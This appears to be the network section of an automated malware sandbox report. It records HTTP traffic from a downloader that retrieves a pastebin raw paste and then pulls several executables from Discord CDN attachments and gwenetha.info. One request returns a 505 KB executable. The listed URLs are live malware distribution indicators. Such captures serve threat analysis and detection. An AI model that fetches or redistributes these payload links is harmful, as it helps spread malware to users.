Network Analysis

GET /raw/gCyjHCCH HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 01:24:35 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d87340cea551b165946927ceb49a931731617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 441 cf-request-id: 094b877881000012cadb9be000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare CF-RAY: 63bf750739c112ca-ICN

GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 01:24:35 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d910dcd54018a1bf1307d0541146f44501617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63bf750789f3e9cc-ICN Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 01:24:35 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094b8778b80000e9cc6da4b000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UylgwfdyOOWBJ9dS-Xcqst7QYowf0pEF4wncUrGQ0Dprg540KlcUNVzKkx3YJDjOvffZnEaSNv1f9qji3qyVLo3hr56iA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QDAUzSXzycce%2FJB69h8SSeutSqqKxq%2BvosxHrDZ%2BdS3MM1LptZr%2BT9vKzd70%2F2afrd4cWZ%2F0qKqdvjS%2F3Hj2%2FA4I2XV3UyXVFjuBp%2FGHOndv8Jw%3D"}],"max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 01:24:35 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=da0b986289125cf9afe0b5525bd4fcdf81617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63bf7507997e3526-ICN Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 01:24:35 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094b8778bf00003526ff319000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-Uwm0XRYFEW2i7b_brz6gt4UnfkpzkNXbHnnZFRk5u-0nCOctdKYz9n09N_nyb7KQUp5tN9l-RFlsVi2Yb55QQ6IyvDuMA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=dPFCmAs5narNXFd9E0cVNSAPrkhu5JVY17L%2Bs190F6RO%2B2vozufPY81Uur1uI9l96YKzdgkzEZ34IXGAxCWWETkfKDHeBvPZ%2B3iXZABTcTHM2tI%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /setup-KGQJ-1.exe HTTP/1.1 Host: gwenetha.info Connection: Keep-Alive

HTTP/1.1 404 Not Found Date: Wed, 07 Apr 2021 01:24:36 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 19 Connection: keep-alive Set-Cookie: __cfduid=dbbe39050d3d54c4a7e3db30725aa3bf01617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC cf-request-id: 094b877acf0000eb4d24045000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VCP99QU1%2Bg%2BJk42MDYD0HyDMDzqt%2BsOhmBk1yK3IkBcpaa%2BgdnlG%2BL2loJILA%2B1Y8jL6juV27AcyLL%2FRm7kHatYlb95TkQ6lFf1VKLxK"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63bf750ae8e5eb4d-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 01:24:36 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=dde60735cc844582f6f04e9094e4c9e4c1617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63bf750a9f75e9f8-ICN Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 01:24:35 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094b877a9c0000e9f8a10aa000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-Uxlbs8brE9RsZ5F8E_z1R7FG7dSYZnNIENMkJaXh3aHZya4ZkmC-odE-nUvEpsuFieF5_oQ-az2TJ8nEfXkJ_vTbJ030Q X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UIzutKdcWa5gpLp0SLlMaEjtPCbflLOVM%2Buxtg%2BegiPP9Vv6Vbsf4SijUCy8MvbNMZjjrhUlU7C%2BI72KjC0J5J5rj2ZwpQpcoTAnmsBFSKqIP1g%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 01:24:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dde60735cc844582f6f04e9094e4c9e4c1617758675; expires=Fri, 07-May-21 01:24:35 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 094b877ab00000e9f8a417b000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1%2FDKNuXt8g%2BQPIkWdfWEW1WMYF8OZKM8m8fEDWcBUdAONM4ceb6RLN%2B93UIKIRAyZDDvQV1DWSY2ezOxUAaUwkX6M47yluY34y5RcIRccxd4JII%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63bf750abfaae9f8-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 01:24:38 GMT Content-Type: application/x-msdos-program Content-Length: 505856 Connection: keep-alive Set-Cookie: __cfduid=d26e9aa6dea121977e4ec3ff0b3f53d851617758678; expires=Fri, 07-May-21 01:24:38 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63bf751b3e19e9f8-ICN Accept-Ranges: bytes Age: 613687 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe ETag: "28345a7bb63babaf99e760965ce493b7" Expires: Thu, 07 Apr 2022 01:24:38 GMT Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094b8785040000e9f8feab3000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1617132901889175 x-goog-hash: crc32c=Ws/4nQ== x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 505856 X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kGdWAxbrFECQNItNOWPym3bOolbBfaewHs%2F6GmOLN0MGk%2BuX6DmZlXckU%2BLX6cwOhYqoYhQXC%2Fn%2BPgyjHbXk6Hqlt%2FFWBYaaUGkEN3VacuZ51xA%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare